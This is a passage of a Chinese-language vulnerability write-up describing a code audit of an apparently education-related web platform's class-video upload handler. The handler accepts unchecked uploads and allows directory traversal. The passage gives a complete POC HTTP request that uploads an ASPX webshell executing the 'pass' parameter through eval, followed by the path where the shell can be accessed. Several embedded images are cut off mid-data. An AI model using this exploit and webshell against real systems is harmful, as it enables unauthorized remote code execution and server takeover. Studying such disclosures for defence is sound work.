<p blockindex=8>上述代码中可以看到通过REQUEST方式传参orgid、classID、file_tmid三个参数，其中<strong>orgid</strong>对应的是<strong>上传目录名</strong>（经检测可以使用../进行目录穿越），<strong>file_tmid</strong>对应的是<strong>上传文件名</strong>，classID则是班级视频表参数（不重要）；<strong>且上述代码中未对上传文件后缀及文件内容进行检测</strong></p>
<p blockindex=9><strong>这里有个点，后面的if判断中按代码顺序把文件先删掉，然后在保存。。。</strong></p>
<p blockindex=10>接着找到对应调用的文件<code>/Tool/ImportClassVideo.aspx</code><br>
通过观察该文件内容，发现调用文件<code>/Tool/ReceiveClassVideo.ashx</code></p>
<p blockindex=11><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABQQAAACHCAYAAABAglRKAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nO3df3RV5Z0v/jdqCxo4CQEhWCKRpNMOlx83AqU4DY2poPKFUZBAC7NcX+8QZnAKMxddMBkUFijDxaXcW2nL1OS7nOUaaBULTOEbrWBMw1yp9UeWwGVsTTAYCyEgJgdToVq9f+z9Pmef5+x9fp+ck5z3ay0X5px99n7O/nX2ec57f55BlZWVX5w5cwaXL19GNhk/fjyysV0AsHDhQjQ3N+PChQuZboqIiIiIiIiIiEhcrsp0A0RERERERERERKTvqENQREREREREREQkh6hDUEREREREREREJIeoQ1BERERERERERCSHqENQREREREREREQkh6hDUEREREREREREJIeoQ1BERERERERERCSHqENQREREREREREQkh6hDUEREREREREREJIeoQ1BERERERERERCSHqENQREREREREREQkh6hDUEREREREREREJIeoQ1BERERERERERCSHqENQREREREREREQkh6hDUEREREREREREJIeoQ1BERERERERERCSHqENQREREREREREQkh6hDUEREREREREREJIeoQ1BERERERERERCSHqENQRERkABo0aBAGDRqU6WaIiIiIiEgWUoegiIiIiIiIiIhIDrkm0w0QERGR1LnmGuuj/eqrrwYAXLlyJZPNERERERGRLKSEoIiIiIiIiIiISA5RQlBERGQAycvLAwB88sknGW6JiIiIiIhkKyUERUREREREREREcogSgiIiIgMAawYOGTIEAOD3+zPZHBERERERyWJKCIqIiIiIiIiIiOQQJQRFElaJTT9diwnvPIbqTU3hTxdNxK5lk5HnP4btdSfQ3OftS1Im2t/f19mkCuyfUwxkTft9eLhmHqb6+Lcfb+46iEc6M9mmxNy3aCnuGgf0thzEssYYkm/2vnTupd1Yczz97esL9y1airuGe+9bhYWFAIDLly8DAL744ovIM+T+CgCnj+Du5zuiL3+c44Gw1wT3t1Nu6925vBiXmZV4nkIH/v2JI3g6hpdE23YxLzNV55bZu7G69hYUBB7w442tk9FwyDHNysPYUF0G9LyKpxYsRehpYznm7nsI0/IjvL6fKK9rx/xSoPvoo3hyfX30F9jrrntPCZ7Z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
<p blockindex=12>至此代码审计结束</p>
<h2 blockindex=13>四、漏洞复现</h2>
<p blockindex=14><img src="data:image/png;base64,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
构造POC如下：</p>
<pre blockindex=15><code class="hljs language-php">POST /Tool/ReceiveClassVideo.ashx?file_tmid=<span class=hljs-number>798</span>&amp;orgid=<span class=hljs-number>1</span>&amp;classID=<span class=hljs-number>1</span> HTTP/<span class=hljs-number>1.1</span>
Host: ip:port
User-Agent: Mozilla/<span class=hljs-number>5.0</span> (Windows NT <span class=hljs-number>10.0</span>; Win64; x64; rv:<span class=hljs-number>99.0</span>) Gecko/<span class=hljs-number>20100101</span> Firefox/<span class=hljs-number>99.0</span>
Content-Length: <span class=hljs-number>367</span>
Accept: application/json, text/javascript, /; q=<span class=hljs-number>0.01</span>
Accept-Language: zh-CN,zh;q=<span class=hljs-number>0.8</span>,zh-TW;q=<span class=hljs-number>0.7</span>,zh-HK;q=<span class=hljs-number>0.5</span>,en-US;q=<span class=hljs-number>0.3</span>,en;q=<span class=hljs-number>0.2</span>,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name=<span class=hljs-string>"File1"</span>; filename=<span class=hljs-string>"1.aspx"</span>
Content-Type: image/jpeg

&lt;%@ Page Language=<span class=hljs-string>"Jscript"</span> validateRequest=<span class=hljs-string>"false"</span> %&gt;
&lt;%
<span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>xxxx</span>(<span class=hljs-params>str</span>)
</span>{
        <span class=hljs-keyword>return</span> <span class=hljs-keyword>eval</span>(str,<span class=hljs-string>"unsafe"</span>);
}
%&gt;
&lt;%<span class=hljs-keyword>var</span> a = Request.Item[<span class=hljs-string>"pass"</span>];%&gt;
&lt;%<span class=hljs-keyword>var</span> b = xxxx(a);%&gt;
&lt;%Response.Write(b);%&gt;
------dqdaieopnozbkapjacdbdthlvtlyl--
</code></pre>
<p blockindex=16><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABf4AAAPiCAYAAAAuPcxuAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdeVxUVf8H8M9l39xYFFSWERBZUlxySy0yF0w0FyxLs0CxFFq0LMrqV9lDj6UtmpYpZcvTgraASVk6Zu6m4gauDCACsomyr/P7Y5hhhnUGZsHx8369eoX3nnvvuffOwLnfe873CEOGDpOCiIiIiIiIiIiIiIiMgomhK0BERERERERERERERNrDwD8RERERERERERERkRFh4J+IiIiIiIiIiIiIyIgw8E9EREREREREREREZEQY+CciIiIiIiIiIiIiMiIM/BMRERERERERERERGREG/omIiIiIiIiIiIiIjAgD/0RERERERERERERERoSBfyIiIiIiIiIiIiIiI8LAPxERERERERERERGRETEbeFeAoetARERERERERERERERaIvj7+0sNXQkiIiIiImpdly5dMGDAAJw/fx7FxcWGrg4REREREXVAS+17Hx8/pEqudHj/TPVDRERERERERERERGREGPgnIiIiIiIiIiIiIjIiDPwTERERERERERERERkRBv6JiIiIiIiIiIiIiIwIA/9EREREREREREREREaEgX8iIiIiIiIiIiIiIiPCwD8RERERERERERERkRExM3QFiIiIiIiIiIiIiIyVpZW14ueSwU8bsCaqup/Zgh7duxm6Gs26UXSz09UtLz9P8XNlRbkBa6Ie9vgnIiIiIiIiIiIi0rHOFPQnzTk5OsHJ0cnQ1VAbA/9EREREREREREREREaEqX6IiIiIiIiIiIiIdIQ9/Y2Lk6MTMjMzDF2NNrHHPxERERERERERERGREWHgn4iIiIiIiIiIiIjIiDDVDxEREREREREREVEnILKXhWsH9DRvdv3l/BrFz16OzYd2z+dWQ1JY0+w6bXB0dISXl6dG21y+fAUAkJ+fr4sqKXTmuukbe/wTERERERERERERERkR9vgnIiIiIiIiIiIi6gRcu8vCtfd5Wje7vrauXPFzS2VKq6Q67fHfo0cPBAYO0mibgoJCALrvVd+Z66Zv7PFPRERERERERERERGREGPgnIiIiIiIiIiIiIjIiTPVDRERERERERERERGopLCzE8eMnNN6G9Is9/omIiIiIiIiIiIiIjAgD/0RERERERERERERE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
<p blockindex=17>返回的响应内容不用管</p>
<pre blockindex=18><code class="hljs language-php">访问url+Upload/AD_Info/<span class=hljs-number>1</span>/<span class=hljs-number>798</span>.aspx
</code></pre>
<p blockindex=19><img src=data:image/png;base64,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